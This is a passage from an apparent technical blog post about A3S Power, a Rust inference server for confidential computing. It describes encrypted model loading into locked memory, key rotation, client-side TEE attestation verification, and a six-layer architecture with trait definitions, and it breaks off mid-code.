&lt;p&gt;Decrypts the entire model into &lt;code&gt;mlock&lt;/code&gt;-locked RAM; plaintext &lt;strong&gt;never touches disk&lt;/strong&gt;. On &lt;code&gt;Drop&lt;/code&gt;, memory is automatically zeroed via &lt;code&gt;Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;&lt;/code&gt;, then &lt;code&gt;munlock&lt;/code&gt; releases the lock.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Encrypted file → AES-256-GCM decryption → mlock-locked RAM → Backend loads
                                                                    │
                                                              On Drop:
                                                              1. Memory zeroing (zeroize)
                                                              2. munlock release
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the recommended choice in TEE mode (&lt;code&gt;in_memory_decrypt = true&lt;/code&gt;), because model plaintext never appears on disk — not even as a temporary file.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mode three: LayerStreamingDecryptedModel (streaming mode)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Designed specifically for the picolm backend. Decrypts the entire model once, then provides chunked access on demand. Each chunk is returned as &lt;code&gt;Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;&lt;/code&gt;, automatically zeroed after use.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Encrypted file → AES-256-GCM decryption → Chunked access interface
                                                    │
                                              picolm requests layer N:
                                              → Returns Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;
                                              → Forward pass
                                              → Chunk Drop → Memory zeroed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This mode pairs perfectly with picolm's layer-streaming inference: at any moment, only one layer's plaintext weights exist in memory.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Management
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;KeyProvider&lt;/code&gt; trait provides an extensible key management interface:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;KeyProvider&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;get_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;rotate_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;provider_name&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two built-in implementations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;StaticKeyProvider&lt;/strong&gt;: Loads key from file or environment variable, cached via &lt;code&gt;OnceCell&lt;/code&gt;. Suitable for single-key scenarios&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RotatingKeyProvider&lt;/strong&gt;: Supports multiple keys, implements zero-downtime rotation via atomic index. &lt;code&gt;rotate_key()&lt;/code&gt; advances to the next key (cycling), &lt;code&gt;get_key()&lt;/code&gt; returns the current key&lt;/li&gt;
&lt;/ul&gt;
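&lt;p&gt;The zero-downtime rotation idea can be sketched with an atomic index over a fixed key set. This is a simplified, synchronous illustration; the real &lt;code&gt;RotatingKeyProvider&lt;/code&gt; implements the async trait above and returns &lt;code&gt;Result&lt;/code&gt;:&lt;/p&gt;

```rust
use std::sync::atomic::{AtomicUsize, Ordering};

/// Simplified sketch: an atomic index cycles through a fixed key set, so
/// rotation never blocks concurrent readers.
struct RotatingKeys {
    keys: Vec<[u8; 32]>,
    current: AtomicUsize,
}

impl RotatingKeys {
    fn get_key(&self) -> [u8; 32] {
        self.keys[self.current.load(Ordering::Acquire) % self.keys.len()]
    }

    fn rotate_key(&self) -> [u8; 32] {
        // Advance to the next key (cycling); fetch_add is atomic, so a
        // concurrent get_key() always observes a valid index.
        let next = self.current.fetch_add(1, Ordering::AcqRel) + 1;
        self.keys[next % self.keys.len()]
    }
}

fn main() {
    let kp = RotatingKeys {
        keys: vec![[1u8; 32], [2u8; 32]],
        current: AtomicUsize::new(0),
    };
    assert_eq!(kp.get_key()[0], 1);
    assert_eq!(kp.rotate_key()[0], 2);
    assert_eq!(kp.rotate_key()[0], 1); // cycles back to the first key
}
```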

&lt;p&gt;Key sources support two forms:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Load from file (64 hex characters = 32 bytes)&lt;/span&gt;
&lt;span class="nx"&gt;model_key_source&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/path/to/key.hex"&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Load from environment variable&lt;/span&gt;
&lt;span class="nx"&gt;model_key_source&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"MY_MODEL_KEY"&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For production environments requiring HSM/KMS integration, a custom &lt;code&gt;KeyProvider&lt;/code&gt; can be implemented.&lt;/p&gt;

&lt;p&gt;At this point, that prompt's journey is nearly complete. Inference is done, and the response is returned to the trader through an encrypted channel. But before trusting this response, the client has one last thing to do.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. How Can the Client Verify All of This Itself?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: "Please Trust Us" Isn't Enough
&lt;/h3&gt;

&lt;p&gt;The server says it's running in a TEE, says it's doing log redaction, says it loaded the correct model. But these are all self-declarations from the server. Why should the client believe them?&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: Independent Client Verification
&lt;/h3&gt;

&lt;p&gt;A3S Power's security model isn't "please trust us" — it's "please verify yourself." The client independently verifies every security claim the server makes through the &lt;code&gt;a3s-power-verify&lt;/code&gt; CLI or Verify SDK.&lt;/p&gt;

&lt;p&gt;The complete chain of trust looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AMD/Intel Silicon (physical hardware — root of trust)
    │
    ├── Secure Processor (PSP / SGX)
    │   └── Manages AES encryption keys for each VM
    │
    ├── Hardware Root Key (ARK / Intel Root CA)
    │   └── Intermediate certificate (ASK / PCK CA)
    │       └── Chip-level certificate (VCEK / PCK)
    │           └── Attestation report signature
    │
    └── Platform Measurement
        └── Hash of code at boot time
            └── Proves runtime environment hasn't been tampered with
                │
                ├── report_data[0..32] = nonce (prevents replay)
                └── report_data[32..64] = model_sha256 (model identity)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;verify_report()&lt;/code&gt; function performs four-step verification, each an independent security check:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step one: Nonce binding verification.&lt;/strong&gt; Checks whether &lt;code&gt;report_data[0..32]&lt;/code&gt; equals the nonce the client sent. Prevents replay attacks — an attacker cannot use an old attestation report to impersonate the current TEE environment. Verification uses constant-time comparison to prevent timing side channels.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step two: Model hash binding verification.&lt;/strong&gt; Checks whether &lt;code&gt;report_data[32..64]&lt;/code&gt; equals the expected model SHA-256 hash. Proves the server is running the model you expect — not a smaller substitute, not a backdoored version.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step three: Platform measurement verification.&lt;/strong&gt; Checks whether &lt;code&gt;measurement&lt;/code&gt; (48-byte SHA-384) equals a known-good value. Proves the TEE environment's boot code (firmware, kernel, application) hasn't been tampered with.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step four: Hardware signature verification.&lt;/strong&gt; Verifies the attestation report's signature via the &lt;code&gt;HardwareVerifier&lt;/code&gt; trait:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AMD SEV-SNP&lt;/strong&gt;: Fetches VCEK certificate from AMD KDS, verifies ECDSA P-384 signature. Certificate chain: ARK → ASK → VCEK → report signature&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Intel TDX&lt;/strong&gt;: Fetches PCK certificate from Intel PCS, verifies ECDSA P-256 signature. Certificate chain: Intel Root CA → PCK CA → PCK → report signature&lt;/li&gt;
&lt;/ul&gt;
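&lt;p&gt;The constant-time comparison used in step one can be sketched as follows: XOR every byte pair and OR the results together, so the running time does not depend on where the first mismatch occurs. Production code typically relies on a vetted primitive (such as the &lt;code&gt;subtle&lt;/code&gt; crate) rather than hand-rolling this:&lt;/p&gt;

```rust
/// Constant-time equality check over byte slices. Sketch of the idea only;
/// a vetted constant-time library is preferable in production.
fn ct_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        return false;
    }
    let mut diff = 0u8;
    for (x, y) in a.iter().zip(b.iter()) {
        diff |= x ^ y; // accumulates any mismatch without early exit
    }
    diff == 0
}

fn main() {
    let nonce = [7u8; 32];
    let mut report_data = [7u8; 32];
    assert!(ct_eq(&nonce, &report_data));
    report_data[31] ^= 1;
    assert!(!ct_eq(&nonce, &report_data));
}
```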

&lt;p&gt;Certificate cache has a 1-hour TTL to avoid frequent requests being rate-limited by AMD KDS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;VerifyOptions&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nv"&gt;'a&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;expected_model_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;expected_measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;hardware_verifier&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt;'a&lt;/span&gt; &lt;span class="k"&gt;dyn&lt;/span&gt; &lt;span class="n"&gt;HardwareVerifier&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Together, the four verification steps mean the client can independently confirm the inference server's identity, runtime environment, and model identity without trusting any intermediary.&lt;/p&gt;

&lt;p&gt;That prompt's journey ends here. From the hardware attestation in the TLS handshake, to TEE memory encryption, to model identity verification, to layer-streaming inference, to log redaction and memory zeroing, to independent client verification — every step has cryptographic guarantees, depending on no one's promises.&lt;/p&gt;

&lt;p&gt;Now let's step back and look at the architecture supporting all of this.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. Six-Layer Architecture: What's Inside
&lt;/h2&gt;

&lt;p&gt;A3S Power is written in Rust. The entire system consists of six layers, each with clear responsibilities, communicating with adjacent layers through trait interfaces.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer Topology
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────────────────────────┐
│  API Layer                                                          │
│  /v1/chat/completions · /v1/completions · /v1/embeddings            │
│  /v1/models · /v1/attestation · /health · /metrics                  │
├─────────────────────────────────────────────────────────────────────┤
│  Server Layer                                                       │
│  RateLimiter → RequestID → Metrics → Tracing → CORS → Auth         │
│  AppState · Audit (JSONL/Encrypted/Async/Noop) · Transport          │
├─────────────────────────────────────────────────────────────────────┤
│  Backend Layer                                                      │
│  BackendRegistry (priority routing, TEE-aware)                      │
│  ┌─────────────────┬─────────────────┬────────────────┐             │
│  │ MistralRs ★     │ LlamaCpp        │ Picolm         │             │
│  │ Pure Rust(candle│ C++ bindings    │ Pure Rust      │             │
│  │ GGUF/SafeTensors│ GGUF            │ O(layer_size)  │             │
│  └─────────────────┴─────────────────┴────────────────┘             │
├─────────────────────────────────────────────────────────────────────┤
│  Model Layer                                                        │
│  ModelRegistry · BlobStorage (SHA-256) · GgufMeta · HfPull          │
├─────────────────────────────────────────────────────────────────────┤
│  TEE Layer (cross-cutting security layer)                           │
│  Attestation · EncryptedModel · Privacy · ModelSeal · KeyProvider   │
│  TeePolicy · EPC Detection · RA-TLS Certificate                    │
├─────────────────────────────────────────────────────────────────────┤
│  Verify Layer (client SDK)                                          │
│  verify_report() · HardwareVerifier (AMD KDS / Intel PCS)           │
└─────────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  What Each Layer Does
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;API Layer&lt;/strong&gt; — Provides OpenAI-compatible HTTP endpoints: &lt;code&gt;/v1/chat/completions&lt;/code&gt;, &lt;code&gt;/v1/completions&lt;/code&gt;, &lt;code&gt;/v1/embeddings&lt;/code&gt;, &lt;code&gt;/v1/models&lt;/code&gt;. Plus A3S Power's unique &lt;code&gt;/v1/attestation&lt;/code&gt; endpoint. The &lt;code&gt;autoload&lt;/code&gt; module implements automatic model loading, LRU eviction, decryption, and integrity verification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Server Layer&lt;/strong&gt; — Manages the middleware stack (rate limiting, request ID, metrics, tracing, CORS, authentication), application state (&lt;code&gt;AppState&lt;/code&gt;), audit logging, and transport protocols (TCP/TLS/Vsock). &lt;code&gt;AppState&lt;/code&gt; is the core state container, holding references to all key components: model registry, backend registry, TEE provider, privacy provider, etc.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backend Layer&lt;/strong&gt; — The abstraction layer for inference engines, and the key to A3S Power's architectural flexibility. &lt;code&gt;BackendRegistry&lt;/code&gt; automatically selects the optimal backend based on priority, model format, and hardware conditions. Three built-in backends cover the complete hardware spectrum: picolm (pure Rust layer-streaming, 256MB edge devices), mistralrs (pure Rust candle, standard servers, default), llama.cpp (C++ bindings, GPU acceleration). The &lt;code&gt;Backend&lt;/code&gt; trait is open — you can plug in any inference framework and immediately gain all of A3S Power's security capabilities.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Model Layer&lt;/strong&gt; — Manages model storage, registration, and pulling. &lt;code&gt;BlobStorage&lt;/code&gt; uses SHA-256 content-addressed storage with automatic deduplication. &lt;code&gt;ModelRegistry&lt;/code&gt; manages model manifests via &lt;code&gt;RwLock&amp;lt;HashMap&amp;gt;&lt;/code&gt; with JSON persistence. &lt;code&gt;HfPull&lt;/code&gt; supports pulling models from HuggingFace Hub with resume support and SSE progress streaming.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;TEE Layer&lt;/strong&gt; — The core differentiating layer, cross-cutting all other layers. Contains attestation, encrypted model loading (EncryptedModel), privacy protection (Privacy), model integrity (ModelSeal), key management (KeyProvider), policy engine (TeePolicy), EPC memory detection, and RA-TLS certificate management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify Layer&lt;/strong&gt; — Client SDK for independently verifying server attestation reports. Includes nonce binding verification, model hash binding verification, platform measurement verification, and hardware signature verification (AMD KDS / Intel PCS certificate chain).&lt;/p&gt;

&lt;h3&gt;
  
  
  Minimal Core + External Extensions
&lt;/h3&gt;

&lt;p&gt;The trustworthiness of a security system is inversely proportional to its complexity. More code means more vulnerabilities and harder auditing. A3S Power minimizes the amount of code that must be trusted:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Core (7)                              Extensions (8 traits)
─────────────────────────             ──────────────────────────────────────
AppState (model lifecycle)            Backend: MistralRs / LlamaCpp / Picolm
BackendRegistry + Backend trait       TeeProvider: SEV-SNP / TDX / Simulated
ModelRegistry + ModelManifest         PrivacyProvider: redaction policy
PowerConfig (HCL)                     TeePolicy: allowlist + measurement binding
PowerError (14 variants → HTTP)       KeyProvider: Static / Rotating / KMS
Router + middleware stack             AuthProvider: API Key (SHA-256)
RequestContext (per-request context)  AuditLogger: JSONL / Encrypted / Async / Noop
                                      HardwareVerifier: AMD KDS / Intel PCS
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Core components are stable and non-replaceable; extension components are trait-based and independently replaceable. All extensions have default implementations — works out of the box, customization is optional.&lt;/p&gt;

&lt;p&gt;Here are a few key trait definitions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// TEE hardware abstraction&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;TeeProvider&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;attestation_report&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;AttestationReport&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;is_tee_environment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;tee_type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;TeeType&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Privacy protection policy&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;PrivacyProvider&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;should_redact&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;sanitize_log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;sanitize_error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;should_suppress_token_metrics&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Inference backend&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;Backend&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;name&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;supports&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ModelFormat&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;manifest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ModelManifest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
